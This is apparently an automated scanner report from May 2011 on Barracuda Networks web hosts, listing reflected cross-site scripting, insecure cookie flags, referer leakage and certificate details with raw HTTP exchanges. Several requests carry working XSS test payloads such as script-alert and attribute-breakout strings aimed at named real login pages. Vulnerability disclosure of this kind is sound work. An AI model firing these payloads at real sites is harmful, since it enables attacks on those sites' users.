1. Cross-site scripting (reflected)
1.1. https://login.barracudanetworks.com/ [name of an arbitrarily supplied request parameter]
1.2. https://login.barracudanetworks.com/auth/login/ [service parameter]
1.3. https://login.barracudanetworks.com/auth/login/ [service parameter]
1.4. https://login.barracudanetworks.com/auth/login/ [service parameter]
1.6. http://www.barracudanetworks.com/ [name of an arbitrarily supplied request parameter]
1.7. http://www.barracudanetworks.com/ns/ [name of an arbitrarily supplied request parameter]
2. SSL cookie without secure flag set
2.1. https://login.barracudanetworks.com/
2.2. https://login.barracudanetworks.com/auth/login/
2.3. https://login.barracudanetworks.com/css/
2.4. https://login.barracudanetworks.com/js/
2.5. https://login.barracudanetworks.com/landing/
3.1. https://login.barracuda.com/
3.2. https://login.barracudanetworks.com/
4. Cookie scoped to parent domain
4.1. https://login.barracudanetworks.com/
4.2. https://login.barracudanetworks.com/auth/login/
4.3. https://login.barracudanetworks.com/css/
4.4. https://login.barracudanetworks.com/js/
4.5. https://login.barracudanetworks.com/landing/
5. Cookie without HttpOnly flag set
5.1. https://login.barracudanetworks.com/
5.2. https://login.barracudanetworks.com/auth/login/
5.3. https://login.barracudanetworks.com/css/
5.4. https://login.barracudanetworks.com/js/
5.5. https://login.barracudanetworks.com/landing/
5.6. http://www.barracudanetworks.com/
5.7. http://www.barracudanetworks.com/ns/
6. Password field with autocomplete enabled
7. Cross-domain Referer leakage
7.1. http://www.barracudanetworks.com/ns/
7.2. http://www.barracudanetworks.com/ns/
8. Cross-domain script include
Severity: | High |
Confidence: | Firm |
Host: | https://login.barrac |
Path: | / |
GET /?%0044484"><a>1ee05cfb68c=1 HTTP/1.1 Host: login.barracudanetworks Connection: keep-alive Referer: http://www.barracuda User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=91832325 |
HTTP/1.1 200 OK Date: Mon, 23 May 2011 12:15:00 GMT Server: Apache Set-Cookie: CLOUD_LOCALE=en_US; expires=Sat, 19-Nov-2011 12:15:00 GMT; path=/; domain=.barracudanetworks Set-Cookie: cloud_session=ponu42 Expires: Sun, 23 May 2010 08:15:00 -0400 Cache-Control: no-store Pragma: no-cache Set-Cookie: cloud_session=ponu42 X-Cloud-Auth: 0 Vary: Accept-Encoding,User Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 6326 <!DOCTYPE html> <!-- Portal Version 2.1.0 (32278) --> <html> <head> <meta charset="UTF-8"> <meta http-equiv="Content <title>Sign In > Barracuda Networks</title> <lin ...[SNIP]... <a href="/new_account/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://login.barrac |
Path: | /auth/login/ |
GET /auth/login/?service=2dd75"><x%20style%3dx Host: login.barracudanetworks Connection: keep-alive Referer: http://burp/show/1 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=91832325 |
HTTP/1.1 200 OK Date: Mon, 23 May 2011 12:17:27 GMT Server: Apache Set-Cookie: CLOUD_LOCALE=en_US; expires=Sat, 19-Nov-2011 12:17:27 GMT; path=/; domain=.barracudanetworks Expires: Sun, 23 May 2010 08:17:27 -0400 Cache-Control: no-store Pragma: no-cache Set-Cookie: cloud_session=ke204o X-Cloud-Auth: 0 Vary: Accept-Encoding,User Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 6308 <!DOCTYPE html> <!-- Portal Version 2.1.0 (32278) --> <html> <head> <meta charset="UTF-8"> <meta http-equiv="Content <title>Sign In > Barracuda Networks</title> <lin ...[SNIP]... <a href="/new_account/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://login.barrac |
Path: | /auth/login/ |
GET /auth/login/?username= Host: login.barracudanetworks Connection: keep-alive Referer: https://login.barrac Cache-Control: max-age=0 Origin: https://login.barrac User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=91832325 |
HTTP/1.1 200 OK Date: Mon, 23 May 2011 12:18:27 GMT Server: Apache Set-Cookie: CLOUD_LOCALE=en_US; expires=Sat, 19-Nov-2011 12:18:27 GMT; path=/; domain=.barracudanetworks Expires: Sun, 23 May 2010 08:18:27 -0400 Cache-Control: no-store Pragma: no-cache Set-Cookie: cloud_session=ke204o X-Cloud-Auth: 0 Vary: Accept-Encoding,User Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 6410 <!DOCTYPE html> <!-- Portal Version 2.1.0 (32278) --> <html> <head> <meta charset="UTF-8"> <meta http-equiv="Content <title>Sign In > Barracuda Networks</title> <lin ...[SNIP]... <a href="/new_account/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://login.barrac |
Path: | /auth/login/ |
GET /auth/login/?service Host: login.barracudanetworks Connection: keep-alive Referer: http://burp/show/1 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=91832325 |
HTTP/1.1 200 OK Date: Mon, 23 May 2011 12:17:43 GMT Server: Apache Set-Cookie: CLOUD_LOCALE=en_US; expires=Sat, 19-Nov-2011 12:17:43 GMT; path=/; domain=.barracudanetworks Expires: Sun, 23 May 2010 08:17:43 -0400 Cache-Control: no-store Pragma: no-cache Set-Cookie: cloud_session=ke204o X-Cloud-Auth: 0 Vary: Accept-Encoding,User Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 6428 <!DOCTYPE html> <!-- Portal Version 2.1.0 (32278) --> <html> <head> <meta charset="UTF-8"> <meta http-equiv="Content <title>Sign In > Barracuda Networks</title> <lin ...[SNIP]... <a>xss.cx.PoC=1779a1<x style=x:expr/**/ession ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | https://login.barrac |
Path: | /landing/ |
GET /landing/?%00ad026"><a>00cb64c5efa=1 HTTP/1.1 Host: login.barracudanetworks Connection: keep-alive Referer: https://login.barrac User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=91832325 |
HTTP/1.1 200 OK Date: Mon, 23 May 2011 12:19:10 GMT Server: Apache Set-Cookie: CLOUD_LOCALE=en_US; expires=Sat, 19-Nov-2011 12:19:10 GMT; path=/; domain=.barracudanetworks Expires: Sun, 23 May 2010 08:19:10 -0400 Cache-Control: no-store Pragma: no-cache Set-Cookie: cloud_session=ke204o X-Cloud-Auth: 0 Vary: Accept-Encoding,User Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 6342 <!DOCTYPE html> <!-- Portal Version 2.1.0 (32278) --> <html> <head> <meta charset="UTF-8"> <meta http-equiv="Content <title>Sign In > Barracuda Networks</title> <lin ...[SNIP]... <a href="/new_account/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.barracuda |
Path: | / |
GET /?a=bsf_product&81e60"><script>alert(1)< Host: www.barracudanetworks.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: barra_hidden_menus=a%3A0 |
HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: barra_tracking_code=bsf Set-Cookie: locale=+; expires=Mon, 23-May-2011 11:36:59 GMT Set-Cookie: locale=country_code%0Aus Set-Cookie: barra_hidden_menus=a%3A0 Date: Mon, 23 May 2011 11:45:19 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ht ...[SNIP]... <input type="hidden" name="81e60"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.barracuda |
Path: | /ns/ |
GET /ns/?a=bsf_product&L=en&ea9aa"><script>alert(1)< Host: www.barracudanetworks.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: barra_hidden_menus=a%3A0 |
HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: barra_tracking_code=bsf Set-Cookie: locale=+; expires=Mon, 23-May-2011 11:36:33 GMT Set-Cookie: locale=country_code%0Aus Set-Cookie: barra_hidden_menus=a%3A0 Date: Mon, 23 May 2011 11:44:53 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ht ...[SNIP]... <input type="hidden" name="ea9aa"><script>alert(1)< ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://login.barrac |
Path: | / |
GET / HTTP/1.1 Host: login.barracudanetworks Connection: keep-alive Referer: http://www.barracuda User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=91832325 |
HTTP/1.1 302 Found Date: Mon, 23 May 2011 12:14:25 GMT Server: Apache Set-Cookie: CLOUD_LOCALE=en_US; expires=Sat, 19-Nov-2011 12:14:25 GMT; path=/; domain=.barracudanetworks Set-Cookie: cloud_session=6fufv3 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: cloud_session=6fufv3 Location: https://login.barrac Vary: Accept-Encoding,User Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 66 <h1>302 - Found</h1><p><a href="/auth/login/">/auth |
Severity: | Medium |
Confidence: | Firm |
Host: | https://login.barrac |
Path: | /auth/login/ |
GET /auth/login/ HTTP/1.1 Host: login.barracudanetworks Connection: keep-alive Referer: http://www.barracuda User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=91832325 |
HTTP/1.1 200 OK Date: Mon, 23 May 2011 12:14:27 GMT Server: Apache Set-Cookie: CLOUD_LOCALE=en_US; expires=Sat, 19-Nov-2011 12:14:27 GMT; path=/; domain=.barracudanetworks Expires: Sun, 23 May 2010 08:14:27 -0400 Cache-Control: no-store Pragma: no-cache Set-Cookie: cloud_session=vt3ghp X-Cloud-Auth: 0 Vary: Accept-Encoding,User Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 6191 <!DOCTYPE html> <!-- Portal Version 2.1.0 (32278) --> <html> <head> <meta charset="UTF-8"> <meta http-equiv="Content <title>Sign In > Barracuda Networks</title> <lin ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://login.barrac |
Path: | /css/ |
GET /css/?n=cloud/auth&m Host: login.barracudanetworks Connection: keep-alive Referer: https://login.barrac User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=91832325 |
HTTP/1.1 200 OK Date: Mon, 23 May 2011 12:14:29 GMT Server: Apache Set-Cookie: CLOUD_LOCALE=en_US; expires=Sat, 19-Nov-2011 12:14:29 GMT; path=/; domain=.barracudanetworks Expires: Wed, 22 Jun 2011 12:14:29 GMT Cache-Control: max-age=2592000, public Pragma: max-age=2592000, public Set-Cookie: cloud_session=vt3ghp X-Cloud-Auth: 0 Last-Modified: Wed, 27 Apr 2011 21:35:25 GMT Vary: Accept-Encoding,User Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css Content-Length: 271 #cloud_panel_login {} .message {} .message.error {color: #800000; font-weight: bold} .message.notice {color: #314368} #scroll_pane_body {position: absolute; top: 8px; left: 16px; right: 8px; bottom: ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://login.barrac |
Path: | /js/ |
GET /js/?n=jquery.1.4.2 Host: login.barracudanetworks Connection: keep-alive Referer: https://login.barrac User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=91832325 |
HTTP/1.1 200 OK Date: Mon, 23 May 2011 12:14:29 GMT Server: Apache Set-Cookie: CLOUD_LOCALE=en_US; expires=Sat, 19-Nov-2011 12:14:29 GMT; path=/; domain=.barracudanetworks Expires: Wed, 22 Jun 2011 12:14:29 GMT Cache-Control: max-age=2592000, public Pragma: max-age=2592000, public Set-Cookie: cloud_session=vt3ghp X-Cloud-Auth: 0 Last-Modified: Fri, 06 May 2011 21:55:29 GMT Vary: Accept-Encoding,User Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript Content-Length: 340246 (function(window ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://login.barrac |
Path: | /landing/ |
GET /landing/ HTTP/1.1 Host: login.barracudanetworks Connection: keep-alive Referer: https://login.barrac User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=91832325 |
HTTP/1.1 302 Found Date: Mon, 23 May 2011 12:18:20 GMT Server: Apache Set-Cookie: CLOUD_LOCALE=en_US; expires=Sat, 19-Nov-2011 12:18:20 GMT; path=/; domain=.barracudanetworks Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: cloud_session=ke204o Location: https://login.barrac Vary: Accept-Encoding,User Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 192 <h1>302 - Found</h1><p><a href="/auth/login/ |
Severity: | Medium |
Confidence: | Certain |
Host: | https://login.barracuda |
Path: | / |
Issued to: | login.barracuda.com |
Issued by: | GeoTrust DV SSL CA |
Valid from: | Sun Mar 27 07:46:41 CDT 2011 |
Valid to: | Mon Apr 28 04:55:58 CDT 2014 |
Severity: | Information |
Confidence: | Certain |
Host: | https://login.barrac |
Path: | / |
Issued to: | login.barracudanetworks.com |
Issued by: | GeoTrust DV SSL CA |
Valid from: | Tue Apr 05 12:58:25 CDT 2011 |
Valid to: | Wed May 07 06:16:07 CDT 2014 |
Issued to: | GeoTrust DV SSL CA |
Issued by: | GeoTrust Global CA |
Valid from: | Fri Feb 26 15:32:31 CST 2010 |
Valid to: | Tue Feb 25 15:32:31 CST 2020 |
Issued to: | GeoTrust Global CA |
Issued by: | GeoTrust Global CA |
Valid from: | Mon May 20 23:00:00 CDT 2002 |
Valid to: | Fri May 20 23:00:00 CDT 2022 |
Severity: | Low |
Confidence: | Firm |
Host: | https://login.barrac |
Path: | / |
GET / HTTP/1.1 Host: login.barracudanetworks Connection: keep-alive Referer: http://www.barracuda User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=91832325 |
HTTP/1.1 302 Found Date: Mon, 23 May 2011 12:14:25 GMT Server: Apache Set-Cookie: CLOUD_LOCALE=en_US; expires=Sat, 19-Nov-2011 12:14:25 GMT; path=/; domain=.barracudanetworks Set-Cookie: cloud_session=6fufv3 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: cloud_session=6fufv3 Location: https://login.barrac Vary: Accept-Encoding,User Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 66 <h1>302 - Found</h1><p><a href="/auth/login/">/auth |
Severity: | Low |
Confidence: | Firm |
Host: | https://login.barrac |
Path: | /auth/login/ |
GET /auth/login/ HTTP/1.1 Host: login.barracudanetworks Connection: keep-alive Referer: http://www.barracuda User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=91832325 |
HTTP/1.1 200 OK Date: Mon, 23 May 2011 12:14:27 GMT Server: Apache Set-Cookie: CLOUD_LOCALE=en_US; expires=Sat, 19-Nov-2011 12:14:27 GMT; path=/; domain=.barracudanetworks Expires: Sun, 23 May 2010 08:14:27 -0400 Cache-Control: no-store Pragma: no-cache Set-Cookie: cloud_session=vt3ghp X-Cloud-Auth: 0 Vary: Accept-Encoding,User Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 6191 <!DOCTYPE html> <!-- Portal Version 2.1.0 (32278) --> <html> <head> <meta charset="UTF-8"> <meta http-equiv="Content <title>Sign In > Barracuda Networks</title> <lin ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://login.barrac |
Path: | /css/ |
GET /css/?n=cloud/auth&m Host: login.barracudanetworks Connection: keep-alive Referer: https://login.barrac User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=91832325 |
HTTP/1.1 200 OK Date: Mon, 23 May 2011 12:14:29 GMT Server: Apache Set-Cookie: CLOUD_LOCALE=en_US; expires=Sat, 19-Nov-2011 12:14:29 GMT; path=/; domain=.barracudanetworks Expires: Wed, 22 Jun 2011 12:14:29 GMT Cache-Control: max-age=2592000, public Pragma: max-age=2592000, public Set-Cookie: cloud_session=vt3ghp X-Cloud-Auth: 0 Last-Modified: Wed, 27 Apr 2011 21:35:25 GMT Vary: Accept-Encoding,User Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css Content-Length: 271 #cloud_panel_login {} .message {} .message.error {color: #800000; font-weight: bold} .message.notice {color: #314368} #scroll_pane_body {position: absolute; top: 8px; left: 16px; right: 8px; bottom: ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://login.barrac |
Path: | /js/ |
GET /js/?n=jquery.1.4.2 Host: login.barracudanetworks Connection: keep-alive Referer: https://login.barrac User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=91832325 |
HTTP/1.1 200 OK Date: Mon, 23 May 2011 12:14:29 GMT Server: Apache Set-Cookie: CLOUD_LOCALE=en_US; expires=Sat, 19-Nov-2011 12:14:29 GMT; path=/; domain=.barracudanetworks Expires: Wed, 22 Jun 2011 12:14:29 GMT Cache-Control: max-age=2592000, public Pragma: max-age=2592000, public Set-Cookie: cloud_session=vt3ghp X-Cloud-Auth: 0 Last-Modified: Fri, 06 May 2011 21:55:29 GMT Vary: Accept-Encoding,User Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript Content-Length: 340246 (function(window ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://login.barrac |
Path: | /landing/ |
GET /landing/ HTTP/1.1 Host: login.barracudanetworks Connection: keep-alive Referer: https://login.barrac User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=91832325 |
HTTP/1.1 302 Found Date: Mon, 23 May 2011 12:18:20 GMT Server: Apache Set-Cookie: CLOUD_LOCALE=en_US; expires=Sat, 19-Nov-2011 12:18:20 GMT; path=/; domain=.barracudanetworks Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: cloud_session=ke204o Location: https://login.barrac Vary: Accept-Encoding,User Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 192 <h1>302 - Found</h1><p><a href="/auth/login/ |
Severity: | Low |
Confidence: | Firm |
Host: | https://login.barrac |
Path: | / |
GET / HTTP/1.1 Host: login.barracudanetworks Connection: keep-alive Referer: http://www.barracuda User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=91832325 |
HTTP/1.1 302 Found Date: Mon, 23 May 2011 12:14:25 GMT Server: Apache Set-Cookie: CLOUD_LOCALE=en_US; expires=Sat, 19-Nov-2011 12:14:25 GMT; path=/; domain=.barracudanetworks Set-Cookie: cloud_session=6fufv3 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: cloud_session=6fufv3 Location: https://login.barrac Vary: Accept-Encoding,User Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 66 <h1>302 - Found</h1><p><a href="/auth/login/">/auth |
Severity: | Low |
Confidence: | Firm |
Host: | https://login.barrac |
Path: | /auth/login/ |
GET /auth/login/ HTTP/1.1 Host: login.barracudanetworks Connection: keep-alive Referer: http://www.barracuda User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=91832325 |
HTTP/1.1 200 OK Date: Mon, 23 May 2011 12:14:27 GMT Server: Apache Set-Cookie: CLOUD_LOCALE=en_US; expires=Sat, 19-Nov-2011 12:14:27 GMT; path=/; domain=.barracudanetworks Expires: Sun, 23 May 2010 08:14:27 -0400 Cache-Control: no-store Pragma: no-cache Set-Cookie: cloud_session=vt3ghp X-Cloud-Auth: 0 Vary: Accept-Encoding,User Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 6191 <!DOCTYPE html> <!-- Portal Version 2.1.0 (32278) --> <html> <head> <meta charset="UTF-8"> <meta http-equiv="Content <title>Sign In > Barracuda Networks</title> <lin ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://login.barrac |
Path: | /css/ |
GET /css/?n=cloud/auth&m Host: login.barracudanetworks Connection: keep-alive Referer: https://login.barrac User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=91832325 |
HTTP/1.1 200 OK Date: Mon, 23 May 2011 12:14:29 GMT Server: Apache Set-Cookie: CLOUD_LOCALE=en_US; expires=Sat, 19-Nov-2011 12:14:29 GMT; path=/; domain=.barracudanetworks Expires: Wed, 22 Jun 2011 12:14:29 GMT Cache-Control: max-age=2592000, public Pragma: max-age=2592000, public Set-Cookie: cloud_session=vt3ghp X-Cloud-Auth: 0 Last-Modified: Wed, 27 Apr 2011 21:35:25 GMT Vary: Accept-Encoding,User Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css Content-Length: 271 #cloud_panel_login {} .message {} .message.error {color: #800000; font-weight: bold} .message.notice {color: #314368} #scroll_pane_body {position: absolute; top: 8px; left: 16px; right: 8px; bottom: ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://login.barrac |
Path: | /js/ |
GET /js/?n=jquery.1.4.2 Host: login.barracudanetworks Connection: keep-alive Referer: https://login.barrac User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=91832325 |
HTTP/1.1 200 OK Date: Mon, 23 May 2011 12:14:29 GMT Server: Apache Set-Cookie: CLOUD_LOCALE=en_US; expires=Sat, 19-Nov-2011 12:14:29 GMT; path=/; domain=.barracudanetworks Expires: Wed, 22 Jun 2011 12:14:29 GMT Cache-Control: max-age=2592000, public Pragma: max-age=2592000, public Set-Cookie: cloud_session=vt3ghp X-Cloud-Auth: 0 Last-Modified: Fri, 06 May 2011 21:55:29 GMT Vary: Accept-Encoding,User Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript Content-Length: 340246 (function(window ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://login.barrac |
Path: | /landing/ |
GET /landing/ HTTP/1.1 Host: login.barracudanetworks Connection: keep-alive Referer: https://login.barrac User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=91832325 |
HTTP/1.1 302 Found Date: Mon, 23 May 2011 12:18:20 GMT Server: Apache Set-Cookie: CLOUD_LOCALE=en_US; expires=Sat, 19-Nov-2011 12:18:20 GMT; path=/; domain=.barracudanetworks Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: cloud_session=ke204o Location: https://login.barrac Vary: Accept-Encoding,User Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 192 <h1>302 - Found</h1><p><a href="/auth/login/ |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.barracuda |
Path: | / |
GET /?a=bsf_product HTTP/1.1 Host: www.barracudanetworks.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: barra_hidden_menus=a%3A0 |
